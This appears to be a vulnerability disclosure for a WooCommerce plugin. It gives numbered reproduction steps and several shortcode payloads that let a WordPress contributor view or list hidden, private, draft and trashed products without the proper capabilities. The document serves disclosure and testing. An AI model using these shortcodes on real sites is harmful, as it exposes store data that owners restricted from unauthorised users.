Share
## https://sploitus.com/exploit?id=WPEX-ID:A7735FEB-876E-461C-9A56-EA6067FAF277
1. ADMIN: Install WooCommerce
2. ADMIN: Add products of various visibility and statuses including Publish, Draft, Private, and create an extra one so that you can trash it
3. CONTRIBUTOR: Add a new post and embed one of the shortcode scenarios above (see supporting references for examples too)
4. CONTRIBUTOR: Save the post and preview it
5. CONTRIBUTOR: See product(s) you should not be able to access normally as you lack the expected WooCommerce/WordPress capabilities

## Supporting Material/References
Below are the shortcode patterns I tested with along with what is currently possible.

```
You can embed basic info about any Hidden product:
[product id="ANY_HIDDEN_PRODUCT_ID" visibility="hidden"]

You can embed any Hidden product:
[product_page id="ANY_HIDDEN_PRODUCT_ID"]

You can embed any Private, Draft, Pending Review, Trash product:
[product_page id="ANY_PRODUCT_ID" status="ANY_PRODUCT_STATUS"]
^^^ NOTE: if this is in placed into the block editor, the editor will attempt to load that corresponding product ID on next editor load and prevent further edits to the original post. I've reported this separately to WooCommerce already. It's secure because it checks access rights on it's own.

You can list any Hidden products:
[products visibility="hidden"]

You can list any Hidden products by ID:
[products ids="ANY_HIDDEN_PRODUCT_IDS_COMMA_SEPARATED" visibility="hidden"]
```